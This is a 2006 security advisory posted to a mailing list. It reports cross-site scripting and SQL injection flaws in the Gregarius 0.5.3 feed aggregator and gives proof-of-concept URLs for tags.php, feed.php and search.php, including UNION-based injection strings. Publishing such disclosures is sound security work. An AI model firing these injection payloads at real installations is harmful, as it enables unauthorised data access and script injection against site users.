From: SecuriTeam <>
To: [email protected]
Date: 5 Mar 2006 14:59:07 +0200
Subject: [UNIX] Gregarius XSS and SQL Injection Vulnerabilities
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Gregarius XSS and SQL Injection Vulnerabilities
<> Gregarius is "a web-based RSS/RDF/ATOM feed
aggregator, designed to run on your web server, allowing you to access
your news sources from wherever you want". Multiple vulnerabilities have
been discovered in Gregarius, these vulnerabilities allow a remote
attacker to cause the program to insert arbitrary HTML and/or JavaScript
into its web pages as well as allows insertion of arbitrary SQL statements
into statements used by the program.
Vulnerable Systems:
* Gregarius version 0.5.3
Immune Systems:
* Gregarius version 0.5.3 SVN
XSS in search.php:
The following URL can used to trigger a cross site scripting vulnerability
in the search.php file:
XSS in tags.php:
The following URL can used to trigger a cross site scripting vulnerability
in the tags.php file: tags.php?tag=<script>alert(1)</script>
SQL Injection in feed.php:
The following URL can be used to trigger an SQL injection vulnerability in
the feed.php file:
feed.php?folder=3 and 1=1 UNION select title from item--
SQL Injection in search.php:
The SQL injection can be further exploited if magic_quotes have been set
to off:
search.php?rss_query=aa%')) UNION select
null,null,null,null,null,null,null,null,null,null,null,title,null from
item-- &rss_query_match=exact
The information has been provided by <>
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